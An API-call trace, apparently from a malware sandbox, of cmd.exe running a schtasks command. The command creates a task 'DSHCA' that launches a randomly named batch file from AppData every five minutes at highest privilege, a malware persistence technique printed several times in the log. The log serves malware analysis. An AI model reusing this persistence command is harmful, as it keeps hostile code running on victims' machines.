lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x4, lpData=0x1eecb8*=0x1, lpcbData=0x1eecb0*=0x4) returned 0x0 [0167.470] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x0, lpData=0x1eecb8*=0x1, lpcbData=0x1eecb0*=0x1000) returned 0x2 [0167.470] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x4, lpData=0x1eecb8*=0x0, lpcbData=0x1eecb0*=0x4) returned 0x0 [0167.471] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x4, lpData=0x1eecb8*=0x40, lpcbData=0x1eecb0*=0x4) returned 0x0 [0167.471] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x4, lpData=0x1eecb8*=0x40, lpcbData=0x1eecb0*=0x4) returned 0x0 [0167.471] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x0, lpData=0x1eecb8*=0x40, lpcbData=0x1eecb0*=0x1000) returned 0x2 [0167.471] RegCloseKey (hKey=0x68) returned 0x0 [0167.471] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eecac | out: phkResult=0x1eecac*=0x68) returned 0x0 [0167.471] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x0, lpData=0x1eecb8*=0x40, lpcbData=0x1eecb0*=0x1000) returned 0x2 [0167.471] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x4, lpData=0x1eecb8*=0x1, lpcbData=0x1eecb0*=0x4) returned 0x0 [0167.471] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x0, lpData=0x1eecb8*=0x1, lpcbData=0x1eecb0*=0x1000) returned 0x2 [0167.471] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x4, lpData=0x1eecb8*=0x0, lpcbData=0x1eecb0*=0x4) returned 0x0 [0167.471] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x4, lpData=0x1eecb8*=0x9, lpcbData=0x1eecb0*=0x4) returned 0x0 [0167.471] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x4, lpData=0x1eecb8*=0x9, lpcbData=0x1eecb0*=0x4) returned 0x0 [0167.472] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x0, lpData=0x1eecb8*=0x9, lpcbData=0x1eecb0*=0x1000) returned 0x2 [0167.472] RegCloseKey (hKey=0x68) returned 0x0 [0167.472] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2c4 [0167.472] srand (_Seed=0x5f51e2c4) [0167.472] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Create /tn DSHCA /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat\" /sc minute /mo 5 /RL HIGHEST /F" [0167.472] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Create /tn DSHCA /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat\" /sc minute /mo 5 /RL HIGHEST /F" [0167.473] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.473] GetProcessHeap () returned 0x610000 [0167.473] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x622230 [0167.473] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x622238, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0167.474] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0167.474] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0167.474] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0167.474] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0167.474] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0167.474] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0167.474] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0167.474] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0167.474] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0167.474] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0167.474] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0167.474] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0167.474] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0167.474] GetProcessHeap () returned 0x610000 [0167.474] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x54) returned 0x622448 [0167.474] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efa78 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.475] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1efa78, lpFilePart=0x1efa74 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1efa74*="Desktop") returned 0x25 [0167.475] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0167.475] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef7f4 | out: lpFindFileData=0x1ef7f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6220b0 [0167.475] FindClose (in: hFindFile=0x6220b0 | out: hFindFile=0x6220b0) returned 1 [0167.475] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ef7f4 | out: lpFindFileData=0x1ef7f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6220b0 [0167.476] FindClose (in: hFindFile=0x6220b0 | out: hFindFile=0x6220b0) returned 1 [0167.476] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0167.476] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ef7f4 | out: lpFindFileData=0x1ef7f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6220b0 [0167.476] FindClose (in: hFindFile=0x6220b0 | out: hFindFile=0x6220b0) returned 1 [0167.476] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0167.477] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.477] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0167.477] GetProcessHeap () returned 0x610000 [0167.477] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x622d70 | out: hHeap=0x610000) returned 1 [0167.477] GetEnvironmentStringsW () returned 0x6243f0* [0167.477] GetProcessHeap () returned 0x610000 [0167.477] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb36) returned 0x622ca8 [0167.477] FreeEnvironmentStringsW (penv=0x6243f0) returned 1 [0167.477] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.477] GetProcessHeap () returned 0x610000 [0167.477] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x622448 | out: hHeap=0x610000) returned 1 [0167.477] GetProcessHeap () returned 0x610000 [0167.477] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400e) returned 0x6243f0 [0167.478] GetProcessHeap () returned 0x610000 [0167.478] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x104) returned 0x628408 [0167.478] GetProcessHeap () returned 0x610000 [0167.478] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6243f0 | out: hHeap=0x610000) returned 1 [0167.478] GetConsoleOutputCP () returned 0x1b5 [0167.478] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0167.478] GetUserDefaultLCID () returned 0x409 [0167.479] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0167.479] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efbb8, cchData=128 | out: lpLCData="0") returned 2 [0167.479] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efbb8, cchData=128 | out: lpLCData="0") returned 2 [0167.479] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efbb8, cchData=128 | out: lpLCData="1") returned 2 [0167.479] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0167.479] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0167.479] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0167.479] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0167.479] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0167.480] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0167.480] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0167.480] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0167.480] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0167.480] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0167.480] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0167.482] GetProcessHeap () returned 0x610000 [0167.482] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20c) returned 0x628518 [0167.482] GetConsoleTitleW (in: lpConsoleTitle=0x628518, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0167.482] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.482] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0167.482] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0167.483] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0167.484] GetProcessHeap () returned 0x610000 [0167.484] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x6243f0 [0167.484] GetProcessHeap () returned 0x610000 [0167.484] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6243f0 | out: hHeap=0x610000) returned 1 [0167.485] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0167.485] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0167.485] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0167.485] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0167.486] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0167.486] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0167.486] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0167.486] GetProcessHeap () returned 0x610000 [0167.486] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x622448 [0167.486] GetProcessHeap () returned 0x610000 [0167.486] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1a) returned 0x6224e8 [0167.491] GetProcessHeap () returned 0x610000 [0167.491] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xf0) returned 0x628730 [0167.492] GetConsoleTitleW (in: lpConsoleTitle=0x1ef8b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0168.283] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0168.283] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0168.283] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0168.283] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0168.283] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0168.283] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0168.283] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0168.283] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0168.283] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0168.283] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0168.283] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0168.284] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0168.284] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0168.284] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0168.284] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0168.284] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0168.284] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0168.284] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0168.284] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0168.284] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0168.284] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0168.284] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0168.284] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0168.285] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0168.285] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0168.285] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0168.285] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0168.285] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0168.285] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0168.285] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0168.285] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0168.285] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0168.285] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0168.285] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0168.285] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0168.285] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0168.285] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0168.286] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0168.286] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0168.286] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0168.286] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0168.286] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0168.286] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0168.286] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0168.286] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0168.286] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0168.286] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0168.286] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0168.286] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0168.287] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0168.287] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0168.287] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0168.287] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0168.287] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0168.287] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0168.287] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0168.287] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0168.287] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0168.287] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0168.287] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0168.287] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0168.288] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0168.288] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0168.288] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0168.288] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0168.288] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0168.288] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0168.288] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0168.288] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0168.288] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0168.288] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0168.288] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0168.289] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0168.289] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0168.289] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0168.289] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0168.289] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0168.289] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0168.289] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0168.289] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0168.289] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0168.289] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0168.289] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0168.289] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0168.290] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0168.290] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0168.290] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0168.292] GetProcessHeap () returned 0x610000 [0168.292] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x628828 [0168.292] GetProcessHeap () returned 0x610000 [0168.292] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x102) returned 0x628a40 [0168.293] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0168.294] GetProcessHeap () returned 0x610000 [0168.294] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x418) returned 0x628b50 [0168.294] SetErrorMode (uMode=0x0) returned 0x0 [0168.294] SetErrorMode (uMode=0x1) returned 0x0 [0168.294] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x628b58, lpFilePart=0x1ef3d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ef3d0*="Desktop") returned 0x25 [0168.294] SetErrorMode (uMode=0x0) returned 0x1 [0168.294] GetProcessHeap () returned 0x610000 [0168.294] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x628b50, Size=0x66) returned 0x628b50 [0168.295] GetProcessHeap () returned 0x610000 [0168.295] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x628b50) returned 0x66 [0168.295] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0168.295] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0168.295] GetProcessHeap () returned 0x610000 [0168.295] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x120) returned 0x628bc0 [0168.295] GetProcessHeap () returned 0x610000 [0168.295] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x238) returned 0x628ce8 [0168.314] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.314] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x1ef14c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef14c) returned 0xffffffff [0168.315] GetLastError () returned 0x2 [0168.315] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks", fInfoLevelId=0x1, lpFindFileData=0x1ef14c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef14c) returned 0xffffffff [0168.315] GetLastError () returned 0x2 [0168.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.316] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x1ef14c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef14c) returned 0x6237e8 [0168.316] GetProcessHeap () returned 0x610000 [0168.316] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x623828 [0168.316] FindClose (in: hFindFile=0x6237e8 | out: hFindFile=0x6237e8) returned 1 [0168.317] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM", fInfoLevelId=0x1, lpFindFileData=0x1ef14c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef14c) returned 0xffffffff [0168.317] GetLastError () returned 0x2 [0168.317] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ef14c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef14c) returned 0x6237e8 [0168.318] GetProcessHeap () returned 0x610000 [0168.318] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x623828, Size=0x4) returned 0x623828 [0168.318] FindClose (in: hFindFile=0x6237e8 | out: hFindFile=0x6237e8) returned 1 [0168.318] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0168.318] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0168.318] GetConsoleTitleW (in: lpConsoleTitle=0x1ef644, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0169.187] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef4cc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef594 | out: lpAttributeList=0x1ef4cc, lpSize=0x1ef594) returned 1 [0169.187] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef4cc, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef58c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef4cc, lpPreviousValue=0x0) returned 1 [0169.187] GetStartupInfoW (in: lpStartupInfo=0x1ef488 | out: lpStartupInfo=0x1ef488*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0169.188] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0169.189] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /Create /tn DSHCA /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat\" /sc minute /mo 5 /RL HIGHEST /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1ef528*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="schtasks /Create /tn DSHCA /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat\" /sc minute /mo 5 /RL HIGHEST /F", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, 